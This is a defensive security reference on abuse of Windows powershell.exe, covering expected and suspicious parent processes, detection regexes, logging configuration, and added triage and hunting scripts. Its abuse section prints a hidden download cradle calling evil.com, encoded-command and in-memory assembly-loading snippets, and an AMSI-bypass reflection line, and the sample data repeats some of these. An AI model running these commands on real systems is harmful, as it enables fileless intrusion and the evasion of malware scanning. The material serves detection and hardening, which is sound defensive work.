Tags: Critical Risk, Windows, Legitimate, Commonly Abused
powershell.exe (System Utility) - Windows PowerShell Security Analysis
powershell.exe is the host executable for **Windows PowerShell** (5.1 and earlier; PowerShell 7 ships as pwsh.exe). It is the single most abused Microsoft-signed binary in attacker tradecraft, covering execution, download cradles, post-exploitation and living-off-the-land activity, because it is present on every supported Windows host and needs nothing dropped to disk. Extensive logging and monitoring is essential.
Risk Summary
CRITICAL priority. PowerShell is the most abused Windows utility. Enable **ScriptBlock Logging**, **Module Logging** and **Transcription**, and remove the PowerShell 2.0 engine, which has none of them. Monitor for: encoded commands, download cradles, AMSI bypass attempts, and suspicious parent processes.
Overview
What is powershell.exe?
powershell.exe is the console host for Windows PowerShell: it parses and runs PowerShell script and commands on top of the .NET Framework, whether typed interactively, passed via -Command, -File or -EncodedCommand, or launched by a scheduled task, service or another process.
Security Significance
- Ubiquitous attacker tooling: installed by default, signed by Microsoft, and used at every stage of an intrusion, so it blends in with administration and needs no malware binary on disk
- Full .NET Access: any .NET API, Win32 via P/Invoke, WMI and COM are reachable, so a script can do anything a compiled implant can
- Download Cradle: a single command line fetches a remote stage and executes it in memory
- Fileless Attacks: payloads are decoded and loaded in memory; only the command line and, if enabled, the script block logs record what ran
- AMSI Integration: script content is handed to the Anti-Malware Scan Interface before it runs, so AV sees the de-obfuscated text; this is why disabling AMSI is a standard first step for attackers and why an AMSI bypass attempt is itself a high-fidelity indicator
Normal Behavior
Expected Parents
| Parent | Context |
|---|---|
| explorer.exe | Interactive launch by a user (console, shortcut, right-click "Run with PowerShell") |
| cmd.exe | Batch file or administrator invoking a script |
| services.exe | A service whose binary path is powershell.exe; confirm the service is expected |
| svchost.exe | Scheduled tasks (Task Scheduler service) |
wsmprovhost.exe (PowerShell Remoting) and WmiPrvSE.exe (WMI process creation) also appear as parents. Both are normal for management tooling and both are classic lateral-movement paths, so judge them by the source host and account rather than by the parent name alone.
Suspicious Parents
| Parent | Risk |
|---|---|
| winword.exe | CRITICAL |
| excel.exe | CRITICAL |
| outlook.exe | CRITICAL |
| mshta.exe | CRITICAL |
| wscript.exe | HIGH |
Common Locations
```text
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
```
A powershell.exe running from any other path is a copied or renamed binary and is suspicious on its own; where the telemetry provides it (Sysmon OriginalFileName, for example), match on the file's original name rather than the process name. The 32-bit SysWOW64 copy is seldom needed on a 64-bit host, so its use deserves a second look.
Suspicious Indicators
Legitimate vs Suspicious
CRITICAL INDICATORS
- -EncodedCommand / -enc / -e (any unambiguous prefix down to -e is accepted): base64 of UTF-16LE script, used to hide the real command from command-line rules
- -ExecutionPolicy Bypass / -ep bypass: execution policy is not a security boundary, but attackers set it reflexively
- -NoProfile -NonInteractive: skips profile scripts and prompts; common in legitimate automation, so weight it by what accompanies it
- -WindowStyle Hidden / -w hidden: no console window for the user to notice
- Invoke-Expression / IEX: executes a string as code; the sink of every download cradle
- DownloadString / DownloadFile on Net.WebClient: fetches the next stage from a remote host
- [Convert]::FromBase64String: unpacks an embedded payload
- New-Object IO.MemoryStream: usually paired with a GzipStream or DeflateStream to inflate a compressed, base64-wrapped stage
- Invoke-Mimikatz: in-memory credential theft
Risk Assessment
| Pattern | Risk Level |
|---|---|
| -enc [base64] | CRITICAL |
| IEX(Net.WebClient) | CRITICAL |
| Invoke-Mimikatz | CRITICAL |
| AMSI bypass attempt | CRITICAL |
| -ExecutionPolicy Bypass | HIGH |
| -WindowStyle Hidden | MEDIUM |
Some management agents and installers use -EncodedCommand and -ExecutionPolicy Bypass legitimately. Baseline those by parent process, signing account and decoded content rather than suppressing the rule, and always rate on the decoded script, not on the base64.
Abuse Techniques
Technique #1: Download Cradle (T1059.001 for the execution, T1105 for the transfer)
```powershell
# -nop (no profile), -w hidden (no window), -c (run this command); the stage is fetched
# and handed straight to IEX, so no file is written
powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"
```
Technique #2: Encoded Commands (T1027.010)
```powershell
# The argument is base64 of the UTF-16LE script; decode it before judging the command
powershell -enc JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAA...
```
Technique #3: AMSI Bypass (T1562.001)
```powershell
# Reflection into the in-process AmsiUtils class to stop the current session being scanned;
# the reference to AmsiUtils is itself logged by ScriptBlock Logging before the bypass takes effect
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils")...
```
Technique #4: Fileless Malware (T1620)
```powershell
# The stage arrives as base64 (command line, file or download), is decoded in memory and
# loaded as a .NET assembly without ever touching disk
$bytes = [Convert]::FromBase64String($encoded)
[System.Reflection.Assembly]::Load($bytes)
```
Detection Guidance
Enable Logging
```powershell
# ScriptBlock Logging (Event ID 4104). The policy keys are absent until created, hence New-Item.
$sbl = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"
New-Item -Path $sbl -Force | Out-Null
Set-ItemProperty -Path $sbl -Name "EnableScriptBlockLogging" -Value 1 -Type DWord
# Transcription (default output: the user's Documents folder; set OutputDirectory to a central share)
$tr = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription"
New-Item -Path $tr -Force | Out-Null
Set-ItemProperty -Path $tr -Name "EnableTranscripting" -Value 1 -Type DWord
```
Run this from an elevated session. For a fleet, apply the same settings through Group Policy (Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell) and forward the Microsoft-Windows-PowerShell/Operational log to the SIEM.
Detection Rules
Rule #1: Encoded Command
CommandLine MATCHES "(?i)\s-e(c|n|nc|nco|ncod|ncode|ncoded|ncodedc|ncodedco|ncodedcom|ncodedcomm|ncodedcomma|ncodedcomman|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}"
→ ALERT: CRITICAL
A pattern such as "-e(nc|ncodedcommand)?" also fires on -ExecutionPolicy and -ep. Requiring whitespace after the switch and a base64-looking argument fixes that, and covers every accepted abbreviation. Decode the argument and run the remaining rules over the decoded text as well.
Rule #2: Download Cradle
CommandLine CONTAINS "DownloadString" OR "DownloadFile" OR "WebClient" OR "Invoke-WebRequest" OR "Invoke-RestMethod"
→ ALERT: CRITICAL
Apply the same strings to ScriptBlockText in Event ID 4104: an encoded or obfuscated cradle never shows them in the command line, and 4104 records the de-obfuscated block.
Rule #3: Suspicious Parent
Parent IN ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "mshta.exe") AND Process = "powershell.exe"
→ ALERT: CRITICAL
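The decode-then-match step that Rules #1 and #2 depend on, as an added example that is not part of the original page. The regex, the function names and the three command lines are this example's own (the command lines are constructed, not captured from a host); the indicator list is the page's.

```powershell
# Added example, not part of the original page: decode and triage powershell.exe command lines
# against the page's indicator list. Sample command lines are constructed, not captured.

# -EncodedCommand may be shortened to any unambiguous prefix, down to -e. Whitespace on both
# sides of the switch keeps -ExecutionPolicy / -ep from matching, and the argument must look
# like base64. This pattern is the example's own, not a rule taken from the page.
$EncodedSwitch = '(?i)(?:^|\s)-e(?:c|n|nc|nco|ncod|ncode|ncoded|ncodedc|ncodedco|ncodedcom|ncodedcomm|ncodedcomma|ncodedcomman|ncodedcommand)?\s+(?<b64>[A-Za-z0-9+/=]{16,})'

# Page indicators, matched as whole words so IEX cannot fire inside another token.
$Indicators = 'Invoke-Expression', 'IEX', 'DownloadString', 'DownloadFile', 'Net.WebClient',
              'FromBase64String', 'IO.MemoryStream', 'Invoke-Mimikatz', 'AmsiUtils', 'amsiInitFailed'

function Expand-EncodedCommand {
    # Returns the decoded script when the command line carries an encoded command, else $null.
    param([Parameter(Mandatory)][string]$CommandLine)
    $m = [regex]::Match($CommandLine, $EncodedSwitch)
    if (-not $m.Success) { return $null }
    try {
        # The argument is base64 over UTF-16LE text ([Text.Encoding]::Unicode), not UTF-8.
        return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups['b64'].Value))
    } catch { return $null }   # not valid base64: treat as an ordinary command line
}

function Get-PowerShellTriage {
    param([Parameter(Mandatory)][string[]]$CommandLine)
    foreach ($cl in $CommandLine) {
        $decoded = Expand-EncodedCommand -CommandLine $cl
        $text    = if ($decoded) { $decoded } else { $cl }   # match the decoded script, not its base64
        $hits    = @($Indicators | Where-Object { $text -match "(?i)\b$([regex]::Escape($_))\b" })
        $bypass  = $cl -match '(?i)\s-e(?:p|x[a-z]*)\s+bypass\b'    # -ep bypass, -ex bypass, -ExecutionPolicy Bypass
        $hidden  = $cl -match '(?i)\s-w[a-z]{0,10}\s+hidden\b'       # -w hidden through -WindowStyle hidden
        # Severities follow the Risk Assessment table; an encoded command whose decoded text shows
        # no indicator is rated HIGH here rather than CRITICAL and left for analyst review.
        $severity = if ($hits.Count -gt 0) { 'CRITICAL' }
                    elseif ($decoded -or $bypass) { 'HIGH' }
                    elseif ($hidden) { 'MEDIUM' }
                    else { 'INFO' }
        [pscustomobject]@{
            Severity    = $severity
            Encoded     = [bool]$decoded
            Indicators  = $hits
            Decoded     = $decoded
            CommandLine = $cl
        }
    }
}

# Constructed samples: an admin backup job, a hidden encoded download cradle, and an encoded but benign command.
$SampleCommandLines = @(
    'powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\Backup.ps1'
    ('powershell.exe -nop -w hidden -ec ' + [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')")))
    ('powershell.exe -enc ' + [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('Get-Date')))
)
Get-PowerShellTriage -CommandLine $SampleCommandLines | Format-List
```

The first sample rates HIGH on -ExecutionPolicy Bypass alone, the second rates CRITICAL because the decoded text contains IEX, Net.WebClient and DownloadString even though the raw command line contains none of them, and the third rates HIGH as an encoded command with nothing suspicious inside. Feed it Security 4688 or Sysmon Event 1 command lines in place of the constructed array.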
Remediation Steps
- Enable ScriptBlock Logging, Module Logging and Transcription organization-wide through Group Policy, and forward the Microsoft-Windows-PowerShell/Operational log to the SIEM
- Remove the PowerShell 2.0 engine (optional feature MicrosoftWindowsPowerShellV2Root): "powershell -version 2" bypasses ScriptBlock Logging and AMSI wherever it is still installed
- Decode and analyze encoded commands; detection content must run over the decoded script, not the base64
- Put non-admin users in Constrained Language Mode, enforced through WDAC or AppLocker script rules; note that it restricts the language (no arbitrary .NET types, no Add-Type, no P/Invoke) rather than blocking PowerShell itself
- Implement application control (WDAC or AppLocker) to limit which scripts run and from where, and deny powershell.exe to users with no business need for it
- Deploy AMSI-aware security solutions and alert on AMSI tampering attempts
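A host-level audit of the controls in this list, as an added example that is not part of the original page. The registry paths are the standard PowerShell policy keys; the function name, the output field names and the optional-feature name for the 2.0 engine on Windows 10/11 are this example's assumptions (on Windows Server the engine is the "PowerShell-V2" feature, read with Get-WindowsFeature instead).

```powershell
# Added example, not part of the original page: audit one host for the remediation items above.
# Needs an elevated session for the optional-feature query; everything else is readable as a user.
function Test-PowerShellHardening {
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    function Get-PolicyValue([string]$Key, [string]$Name) {
        # $null when the policy key or value has never been created
        (Get-ItemProperty -Path "$base\$Key" -Name $Name -ErrorAction SilentlyContinue).$Name
    }
    # The v2 engine has neither ScriptBlock Logging nor AMSI; "powershell -version 2" selects it
    # whenever the optional feature is still installed. $null here means absent or not elevated.
    $v2 = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -ErrorAction SilentlyContinue
    $v2State = if ($null -eq $v2) { 'Unknown (feature absent or session not elevated)' } else { [string]$v2.State }
    [pscustomobject]@{
        ScriptBlockLogging  = (Get-PolicyValue 'ScriptBlockLogging' 'EnableScriptBlockLogging') -eq 1
        ModuleLogging       = (Get-PolicyValue 'ModuleLogging' 'EnableModuleLogging') -eq 1
        Transcription       = (Get-PolicyValue 'Transcription' 'EnableTranscripting') -eq 1
        TranscriptDirectory = Get-PolicyValue 'Transcription' 'OutputDirectory'
        PowerShellV2State   = $v2State          # want 'Disabled' or absent, never 'Enabled'
        # ConstrainedLanguage is what WDAC/AppLocker script enforcement gives a non-admin session;
        # FullLanguage means this session could load arbitrary .NET and call Win32 APIs.
        LanguageMode        = [string]$ExecutionContext.SessionState.LanguageMode
    }
}
Test-PowerShellHardening
```

Run it once per host type in the estate and compare against the policy you intended: the common gaps are transcripts landing in each user's Documents folder because OutputDirectory was never set, and the 2.0 engine still enabled on imaged workstations.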
Investigation Checklist
- Capture the full command line (Security Event ID 4688 with command-line auditing enabled, or Sysmon Event ID 1)
- Decode encoded commands: the -EncodedCommand argument is base64 of UTF-16LE text
- Review ScriptBlock logs (Event ID 4104) and module logs (Event ID 4103); long scripts are split across several 4104 events, so reassemble them by ScriptBlockId before searching
- Check the parent process and the path powershell.exe ran from
- Look for download activity: URLs in the decoded script and 4104 text, proxy and DNS logs
- Check for AMSI tampering: script blocks referencing AmsiUtils, amsiInitFailed or AmsiScanBuffer, and the endpoint product's AMSI detections (Microsoft Defender Operational log Event IDs 1116 and 1117)
- Review network connections made by the process (Sysmon Event ID 3, firewall logs)
- Check persistence mechanisms that invoke powershell.exe: scheduled tasks, Run keys, services, WMI event subscriptions
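The 4104 review step above, as an added example that is not part of the original page: it reassembles multi-part script blocks before matching, which is what catches a keyword the logger happened to split across two events. The function names and the sample fragments are this example's own (the fragments are constructed, not real log data); the indicator list is the page's plus the AMSI-tampering names from the AmsiUtils class.

```powershell
# Added example, not part of the original page: hunt 4104 script-block events for the page's
# indicators after reassembling multi-part blocks. Patterns are regular expressions.
$Indicators = 'Invoke-Expression', '\bIEX\b', 'DownloadString', 'DownloadFile', 'Net\.WebClient',
              'FromBase64String', 'IO\.MemoryStream', 'Invoke-Mimikatz',
              'AmsiUtils', 'amsiInitFailed', 'AmsiScanBuffer', 'amsiContext'

function ConvertFrom-ScriptBlockEvent {
    # Flattens a live 4104 EventLogRecord. Property order for 4104:
    # 0 MessageNumber, 1 MessageTotal, 2 ScriptBlockText, 3 ScriptBlockId, 4 Path
    param([Parameter(Mandatory, ValueFromPipeline)]$Event)
    process {
        [pscustomobject]@{
            MessageNumber   = [int]$Event.Properties[0].Value
            MessageTotal    = [int]$Event.Properties[1].Value
            ScriptBlockText = [string]$Event.Properties[2].Value
            ScriptBlockId   = [string]$Event.Properties[3].Value
            Path            = [string]$Event.Properties[4].Value
        }
    }
}

function Find-SuspiciousScriptBlock {
    param([Parameter(Mandatory)][object[]]$Fragment)
    foreach ($group in ($Fragment | Group-Object ScriptBlockId)) {
        # Long scripts are logged as several 4104 events; join them in order before matching.
        $parts = @($group.Group | Sort-Object MessageNumber)
        $text  = -join $parts.ScriptBlockText
        $hits  = @($Indicators | Where-Object { $text -match "(?i)$_" })
        if ($hits.Count -eq 0) { continue }
        [pscustomobject]@{
            ScriptBlockId = $group.Name
            Fragments     = $parts.Count
            Complete      = ($parts.Count -eq $parts[0].MessageTotal)   # false: events lost or not yet collected
            Indicators    = $hits
            Path          = $parts[0].Path        # empty for script typed or passed on the command line
            Preview       = $text.Substring(0, [Math]::Min(120, $text.Length))
        }
    }
}

# Constructed fragments, not real log data: a benign one-part block, and a two-part block in which
# the logger split the script in the middle of "AmsiUtils" so neither event alone contains it.
$Sample = @(
    [pscustomobject]@{ MessageNumber = 1; MessageTotal = 1; ScriptBlockId = 'block-a'
                       ScriptBlockText = 'Get-ChildItem C:\Logs | Where-Object Length -gt 1MB'; Path = 'C:\Scripts\Rotate.ps1' }
    [pscustomobject]@{ MessageNumber = 1; MessageTotal = 2; ScriptBlockId = 'block-b'
                       ScriptBlockText = '$t = [Ref].Assembly.GetType("System.Management.Automation.Amsi'; Path = '' }
    [pscustomobject]@{ MessageNumber = 2; MessageTotal = 2; ScriptBlockId = 'block-b'
                       ScriptBlockText = 'Utils"); $t.GetFields("NonPublic,Static") | Select-Object Name'; Path = '' }
)
Find-SuspiciousScriptBlock -Fragment $Sample | Format-List

# Live use on a host with ScriptBlock Logging enabled (last 24 hours):
# $events = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = (Get-Date).AddDays(-1) }
# Find-SuspiciousScriptBlock -Fragment ($events | ConvertFrom-ScriptBlockEvent)
```

Only block-b is reported, with two fragments and the AmsiUtils indicator; a per-event search would have missed it because "Amsi" and "Utils" sit in different records. Complete turning up false on a live host usually means the forwarder dropped part of a large script, which is itself worth noting in the case.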
MITRE ATT&CK Techniques
Last verified: January 18, 2026